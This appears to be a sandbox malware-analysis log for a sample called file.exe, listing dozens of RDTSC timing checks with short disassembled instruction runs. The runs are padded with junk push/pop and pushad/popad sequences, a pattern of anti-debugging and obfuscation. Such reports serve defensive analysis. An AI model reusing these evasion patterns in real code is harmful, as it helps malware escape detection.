Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839EFA second address: 839F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839F00 second address: 839F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A459 second address: 83A45D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A45D second address: 83A47B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A708 second address: 83A725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D22h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A9D3 second address: 83A9D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A9D9 second address: 83AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4D45034D28h 0x0000000e pop ecx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4D45034D1Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83AA13 second address: 83AA1D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83AA1D second address: 83AA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839945 second address: 83994B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83994B second address: 83994F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 847BD6 second address: 847C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ch 0x00000007 push edx 0x00000008 jmp 00007F4D44D051A8h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F4D44D051A8h 0x00000018 jmp 00007F4D44D051A2h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84D2AF second address: 84D2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84D2B5 second address: 84D2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E927 second address: 84E92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8520FA second address: 852152 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F4D44D051A9h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F4D44D051A7h 0x00000019 popad 0x0000001a jmp 00007F4D44D051A8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 852152 second address: 852171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D24h 0x00000007 pushad 0x00000008 jno 00007F4D45034D16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854280 second address: 854286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85850D second address: 858513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858513 second address: 858520 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858520 second address: 858537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4D45034D16h 0x0000000a jc 00007F4D45034D16h 0x00000010 je 00007F4D45034D16h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858537 second address: 85853D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85853D second address: 85854E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85854E second address: 858552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858250 second address: 858266 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4D45034D1Dh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1B4 second address: 85E1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1B8 second address: 85E1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1CC second address: 85E1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1D0 second address: 85E205 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4D45034D16h 0x00000008 jns 00007F4D45034D16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007F4D45034D1Bh 0x00000019 jmp 00007F4D45034D25h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E205 second address: 85E20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E20A second address: 85E210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8610FF second address: 861103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861103 second address: 861109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861109 second address: 861118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F4D44D05196h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861118 second address: 861128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861128 second address: 861149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4D44D05196h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F4D44D051A1h 0x00000013 jmp 00007F4D44D0519Bh 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862845 second address: 86285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D21h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86285C second address: 86286B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F4D44D0519Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 868A04 second address: 868A1C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4D45034D1Eh 0x00000008 ja 00007F4D45034D16h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F4D45034D16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8708B4 second address: 8708BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8708BA second address: 8708C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4D45034D16h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F23F second address: 86F248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F248 second address: 86F25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F4E8 second address: 86F4F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F4F0 second address: 86F513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D27h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007F4D45034D16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8705D0 second address: 8705D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8705D6 second address: 8705E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874187 second address: 87418E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A779 second address: 78A77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A77F second address: 78A79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4D44D051A4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A79A second address: 78A7A9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894139 second address: 89413F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89413F second address: 894156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4D45034D1Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894156 second address: 894177 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4D44D051A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894177 second address: 89417B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897145 second address: 89714F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89714F second address: 897159 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897159 second address: 897163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4D44D05196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897163 second address: 897169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897169 second address: 897181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4D44D0519Ah 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897181 second address: 897186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897186 second address: 897197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007F4D44D05196h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AC8EF second address: 8AC902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4D45034D16h 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AC902 second address: 8AC906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1350 second address: 8B1354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1354 second address: 8B136D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4D44D0519Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B01F9 second address: 8B0203 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B078C second address: 8B0799 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0799 second address: 8B07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0D12 second address: 8B0D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0D1B second address: 8B0D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0E67 second address: 8B0E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A6h 0x00000007 jnc 00007F4D44D05196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F4D44D051A0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0E9A second address: 8B0EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0EB7 second address: 8B0EBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1023 second address: 8B103A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F4D45034D20h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B103A second address: 8B1040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1040 second address: 8B104A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4D45034D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B3F6C second address: 8B3F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B3F70 second address: 8B3F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 js 00007F4D45034D1Ch 0x0000000f jno 00007F4D45034D16h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B3F88 second address: 8B3FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F4D44D051A0h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B3FAA second address: 8B3FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8A30 second address: 8B8A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8A34 second address: 8B8A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F4D45034D16h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4D45034D20h 0x0000001f ja 00007F4D45034D16h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8A64 second address: 8B8A7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8A7B second address: 8B8A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8A82 second address: 8B8A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B8A9A second address: 8B8AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0AB4 second address: 4FF0AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4D44D0519Fh 0x00000008 pop esi 0x00000009 mov bx, 3EFCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test ecx, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4D44D0519Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0AE0 second address: 4FF0BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F4D45034D68h 0x00000010 jmp 00007F4D45034D26h 0x00000015 add eax, ecx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4D45034D1Eh 0x0000001e add si, 23A8h 0x00000023 jmp 00007F4D45034D1Bh 0x00000028 popfd 0x00000029 jmp 00007F4D45034D28h 0x0000002e popad 0x0000002f mov eax, dword ptr [eax+00000860h] 0x00000035 jmp 00007F4D45034D20h 0x0000003a test eax, eax 0x0000003c jmp 00007F4D45034D20h 0x00000041 je 00007F4DB5ABAF0Bh 0x00000047 pushad 0x00000048 movzx eax, bx 0x0000004b pushfd 0x0000004c jmp 00007F4D45034D23h 0x00000051 sub esi, 11F27BAEh 0x00000057 jmp 00007F4D45034D29h 0x0000005c popfd 0x0000005d popad 0x0000005e test byte ptr [eax+04h], 00000005h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 pushfd 0x00000066 jmp 00007F4D45034D1Ah 0x0000006b add ah, 00000028h 0x0000006e jmp 00007F4D45034D1Bh 0x00000073 popfd 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA82D second address: 7CA83E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA83E second address: 7CA844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501032C second address: 5010363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4D44D0519Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 mov ax, di 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010363 second address: 50103FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4D45034D20h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F4D45034D20h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 pushad 0x0000001a call 00007F4D45034D1Eh 0x0000001f mov ax, 6A41h 0x00000023 pop ecx 0x00000024 pushfd 0x00000025 jmp 00007F4D45034D27h 0x0000002a xor ch, 0000006Eh 0x0000002d jmp 00007F4D45034D29h 0x00000032 popfd 0x00000033 popad 0x00000034 mov ecx, dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F4D45034D1Dh 0x0000003e rdtsc
